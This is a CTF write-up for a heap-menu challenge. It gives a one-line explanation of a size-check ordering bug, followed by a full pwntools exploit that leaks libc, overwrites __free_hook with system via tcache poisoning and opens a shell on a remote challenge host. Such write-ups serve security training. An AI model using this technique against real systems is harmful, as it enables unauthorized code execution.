菜单堆
问题出在：输入 size 之后，size 会先被保存下来，然后才判断它是否符合要求。
所以可以直接堆溢出。
exp
from pwn import*
# Target selection and the pwntools I/O shorthand used by the rest of the script.
context.log_level = 'debug'
context.arch = 'amd64'
context.os = "linux"

local = 0  # non-zero: spawn ./main locally; zero: connect to the remote service
if local:
    r = process('./main')
else:
    r = remote("113.201.14.253", 21111)

# NOTE(review): machine-specific path; the libc build must match the one the target runs,
# otherwise the symbol offsets used below are wrong.
libc = ELF('/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.4_amd64/libc.so.6')


def sa(s, n):
    """Send *n* (no newline) once the marker *s* has been received."""
    return r.sendafter(s, n)


def sla(s, n):
    """Send *n* followed by a newline once the marker *s* has been received."""
    return r.sendlineafter(s, n)


def sl(s):
    """Send *s* followed by a newline."""
    return r.sendline(s)


def sd(s):
    """Send *s* as-is."""
    return r.send(s)


def rc(n):
    """Receive up to *n* bytes."""
    return r.recv(n)


def ru(s):
    """Receive until the marker *s* (inclusive) has been seen."""
    return r.recvuntil(s)


def ti():
    """Hand the connection over to the user."""
    return r.interactive()


def lg(name, addr):
    """Log *addr* as a hex value under the label *name*."""
    return log.success(name + ":" + hex(addr))
def debug():
    """Attach gdb to the live target and block until the user resumes it."""
    target = r
    gdb.attach(target)
    pause()
def add(idx, size, content):
    """Menu option 1: allocate slot *idx* with *size* bytes, then send *content* at the content prompt.

    The first three answers are line-terminated; *content* is sent verbatim (no newline).
    """
    answers = ((">>\n", "1"), ("idx?\n", str(idx)), ("size?\n", str(size)))
    for prompt, answer in answers:
        sla(prompt, answer)
    sa("content?\n", content)
def fake_add(idx, size):
    """Menu option 1 without answering the content prompt.

    Presumably used with a *size* the program rejects, so no content prompt follows;
    per the note at the top of the page the rejected size is still retained.
    """
    answers = ((">>\n", "1"), ("idx?\n", str(idx)), ("size?\n", str(size)))
    for prompt, answer in answers:
        sla(prompt, answer)
def delete(idx):
    """Menu option 2: free slot *idx*."""
    for prompt, answer in ((">>\n", "2"), ("idx?\n", str(idx))):
        sla(prompt, answer)
def edit(idx, size, content):
    """Menu option 3: announce a write of *size* bytes to slot *idx* and send *content*.

    *content* is sent verbatim (no newline); it may be shorter than *size*.
    """
    answers = ((">>\n", "3"), ("idx?\n", str(idx)), ("size?\n", str(size)))
    for prompt, answer in answers:
        sla(prompt, answer)
    sa("content?\n", content)
def show(idx):
    """Menu option 4: print the contents of slot *idx*."""
    for prompt, answer in ((">>\n", "4"), ("idx?\n", str(idx))):
        sla(prompt, answer)
# --- interaction sequence ---
# NOTE(review): written for Python 2 pwntools; the str concatenation in the leak line
# below (recvuntil result + '\x00\x00') raises TypeError under Python 3, where those are bytes.
# Fill slots 0..7 with 0xf8-byte allocations, plus a small 0x10-byte slot 8.
for i in range(8):
    add(i, 0xf8, "a")
add(8, 0x10, "a")
# Free slots 0..7, then re-allocate seven of them at the same size.
for i in range(8):
    delete(i)
for i in range(7):
    add(i, 0xf8, "a")
# Request 0x500 bytes for slot 0 without a content prompt (see fake_add), then write
# 0x100 bytes into slot 0 via a 0x300-byte edit and print the slot back.
fake_add(0, 0x500)
edit(0, 0x300, "a" * 0x100)
show(0)
# Leak: read up to the first '\x7f', take the 6 bytes ending there, pad to 8 bytes,
# page-align, and add the low 12 bits of __malloc_hook's offset in the libc loaded above.
# Assumes the leaked pointer lies in the same page as __malloc_hook - TODO confirm for the
# target's libc build.
malloc_hook = (u64(ru('\x7f')[-6:] + '\x00\x00') & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
lg("libc_base", libc_base)
# Free slot 2, then repeat the retained-size write on slot 3: 0xf8 filler, a 0x101 size
# field and the computed __free_hook address.
delete(2)
fake_add(3, 0x500)
edit(3, 0x300, "a" * 0xf8 + p64(0x101) + p64(free_hook))
# Two further 0xf8 allocations carrying "/bin/sh\x00" and system's address, then slot 2
# is freed once more before handing the connection to the user.
add(2, 0xf8, "/bin/sh\x00")
add(9, 0xf8, p64(system_addr))
delete(2)
r.interactive()